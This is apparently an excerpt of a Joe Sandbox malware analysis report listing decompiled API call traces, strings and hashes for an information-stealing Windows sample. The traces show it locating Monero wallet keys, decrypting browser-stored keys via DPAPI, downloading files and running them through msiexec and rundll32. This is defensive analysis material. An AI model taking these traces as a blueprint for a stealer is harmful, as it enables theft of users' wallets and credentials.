                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID: .exe
                                                  • API String ID: 1395395982-4119554291
                                                  • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                  • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateGlobalStream
                                                  • String ID: image/jpeg
                                                  • API String ID: 2244384528-3785015651
                                                  • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                  • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00411307
                                                  • strtok_s.MSVCRT ref: 00411750
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s$lstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 348468850-0
                                                  • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                  • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell$lstrcpy
                                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                  • API String ID: 2507796910-3625054190
                                                  • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                  • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                  APIs
                                                  • memset.MSVCRT ref: 02F14505
                                                  • memset.MSVCRT ref: 02F1451C
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F14553
                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 02F14572
                                                  • lstrcat.KERNEL32(?,?), ref: 02F14586
                                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 02F1459A
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F18FF7: GetFileAttributesA.KERNEL32(00000000,?,02F01DBB,?,?,0042565C,?,?,00420E1F), ref: 02F19006
                                                    • Part of subcall function 02F09F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 02F09FA0
                                                    • Part of subcall function 02F09F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 02F09FF9
                                                    • Part of subcall function 02F09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02F09C53
                                                    • Part of subcall function 02F09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02F09C78
                                                    • Part of subcall function 02F09C27: LocalAlloc.KERNEL32(00000040,?), ref: 02F09C98
                                                    • Part of subcall function 02F09C27: ReadFile.KERNEL32(000000FF,?,00000000,02F016F6,00000000), ref: 02F09CC1
                                                    • Part of subcall function 02F09C27: LocalFree.KERNEL32(02F016F6), ref: 02F09CF7
                                                    • Part of subcall function 02F09C27: CloseHandle.KERNEL32(000000FF), ref: 02F09D01
                                                    • Part of subcall function 02F19627: GlobalAlloc.KERNEL32(00000000,02F14644,02F14644), ref: 02F1963A
                                                  • StrStrA.SHLWAPI(?,0064A0D8), ref: 02F1465A
                                                  • GlobalFree.KERNEL32(?), ref: 02F14779
                                                    • Part of subcall function 02F09D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02F05155,00000000,00000000), ref: 02F09D56
                                                    • Part of subcall function 02F09D27: LocalAlloc.KERNEL32(00000040,?,?,?,02F05155,00000000,?), ref: 02F09D68
                                                    • Part of subcall function 02F09D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02F05155,00000000,00000000), ref: 02F09D91
                                                    • Part of subcall function 02F09D27: LocalFree.KERNEL32(?,?,?,?,02F05155,00000000,?), ref: 02F09DA6
                                                    • Part of subcall function 02F0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02F0A094
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1470A
                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 02F14727
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 02F14739
                                                  • lstrcat.KERNEL32(00000000,?), ref: 02F1474C
                                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 02F1475B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                  • String ID:
                                                  • API String ID: 1191620704-0
                                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                  • Instruction ID: 5d0a33678c09ae6833c9e8d2c281e51c4dc02cad11aab85eb9af1ced7a479603
                                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                  • Instruction Fuzzy Hash: EF7164B6A00218BBDB14FBE0DC89FEE737AAF88740F408598E60596180EB75D745CF51
                                                  APIs
                                                  • memset.MSVCRT ref: 0041429E
                                                  • memset.MSVCRT ref: 004142B5
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                  • lstrcatA.KERNEL32(?,02D495F0), ref: 0041430B
                                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                  • lstrcatA.KERNEL32(?,02D48FF0), ref: 00414333
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                  • StrStrA.SHLWAPI(?,02D495C0), ref: 004143F3
                                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                  • String ID:
                                                  • API String ID: 1191620704-0
                                                  • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                  • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                  APIs
                                                  • memset.MSVCRT ref: 00401327
                                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                  • memset.MSVCRT ref: 00401516
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                  • API String ID: 1930502592-218353709
                                                  • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                  • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00406303
                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00406385
                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                  • API String ID: 3532888709-1526165396
                                                  • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                  • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                  • StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00406147
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                  • String ID: a+A$a+A
                                                  • API String ID: 4287319946-2847607090
                                                  • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                  • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • memset.MSVCRT ref: 02F10E83
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10E9C
                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 02F10EAE
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10EC4
                                                  • lstrcat.KERNEL32(?,00420D80), ref: 02F10ED6
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10EEF
                                                  • lstrcat.KERNEL32(?,00420D84), ref: 02F10F01
                                                  • lstrlen.KERNEL32(?), ref: 02F10F0E
                                                  • memset.MSVCRT ref: 02F10F34
                                                  • memset.MSVCRT ref: 02F10F48
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F19927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02F10DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02F19948
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02F10FC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F10FCD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID:
                                                  • API String ID: 1395395982-0
                                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                  • Instruction ID: 7ef6f1471424040ddb573a42b6609384e66013eea27c60a075d7ac08389f7528
                                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                  • Instruction Fuzzy Hash: DB8194B5941218ABCB14EBA0DD91FED773AAF44744F80419DA30A660C1EF746B88CF59
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • memset.MSVCRT ref: 02F10E83
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10E9C
                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 02F10EAE
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10EC4
                                                  • lstrcat.KERNEL32(?,00420D80), ref: 02F10ED6
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10EEF
                                                  • lstrcat.KERNEL32(?,00420D84), ref: 02F10F01
                                                  • lstrlen.KERNEL32(?), ref: 02F10F0E
                                                  • memset.MSVCRT ref: 02F10F34
                                                  • memset.MSVCRT ref: 02F10F48
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
